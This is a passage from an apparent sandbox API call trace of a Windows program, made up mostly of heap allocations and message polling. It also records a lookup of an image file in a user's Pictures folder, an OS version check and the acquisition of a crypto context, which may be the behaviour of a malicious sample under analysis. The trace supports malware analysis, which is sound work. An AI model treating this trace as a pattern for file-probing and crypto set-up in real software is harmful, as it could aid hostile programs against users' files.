(in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0256.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0256.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0256.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0256.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0256.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0256.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0256.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0256.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0256.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0256.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0256.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0256.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0256.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0256.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0256.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0256.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0256.538] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0256.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0256.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0256.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0256.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0256.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0256.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0256.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0256.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0256.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0256.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0256.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0256.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0256.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0256.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0256.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0256.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0256.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0256.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0256.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0256.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.540] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures/Ur-fU4s.jpg", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29a001f0, ftCreationTime.dwHighDateTime=0x1d4d020, ftLastAccessTime.dwLowDateTime=0x464cd3a0, ftLastAccessTime.dwHighDateTime=0x1d4cd1e, ftLastWriteTime.dwLowDateTime=0x464cd3a0, ftLastWriteTime.dwHighDateTime=0x1d4cd1e, nFileSizeHigh=0x0, nFileSizeLow=0xe5f1, dwReserved0=0xc170047, dwReserved1=0x1fac6, cFileName="Ur-fU4s.jpg", cAlternateFileName="")) returned 0xaa5960 [0256.540] FindClose (in: hFindFile=0xaa5960 | out: hFindFile=0xaa5960) returned 1 [0256.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0256.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0256.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0256.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0256.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0256.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0256.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0256.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0256.541] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0256.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0256.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0256.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0256.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0256.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0256.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0256.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0256.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0256.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0256.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0256.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0256.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0256.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0256.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0256.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0256.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0256.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0256.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0256.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0256.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0256.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0256.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0256.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0256.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0256.543] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.543] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0256.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0256.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0256.543] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.543] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0256.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0256.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0256.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0256.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0256.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0256.544] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0256.544] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.544] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0256.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0256.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0256.544] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0256.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.544] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0256.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0256.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0256.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0256.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0256.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0256.545] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0256.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0256.545] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0256.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0256.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0256.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0256.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0256.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0256.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0256.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0256.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0256.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0256.546] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0256.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.546] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0256.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0256.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0256.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0256.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0256.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0256.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0256.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0256.547] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.547] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.547] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0256.547] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.547] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0256.547] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.547] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.547] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0256.547] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.547] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.547] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.547] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0256.548] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0256.548] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0256.548] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.548] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0256.548] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.548] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0256.548] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0256.548] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0256.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0256.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0256.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0256.548] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2698) returned 1 [0256.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0256.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0256.549] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0256.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0256.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0256.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0256.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0256.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0256.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0256.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0256.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0256.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0256.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0256.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0256.550] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0256.550] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0256.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0256.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0256.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0256.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0256.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0256.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0256.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0256.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0256.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0256.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0256.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0256.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0256.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.551] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0256.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0256.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0256.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0256.551] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0256.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0256.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0256.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0256.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0256.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0256.552] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 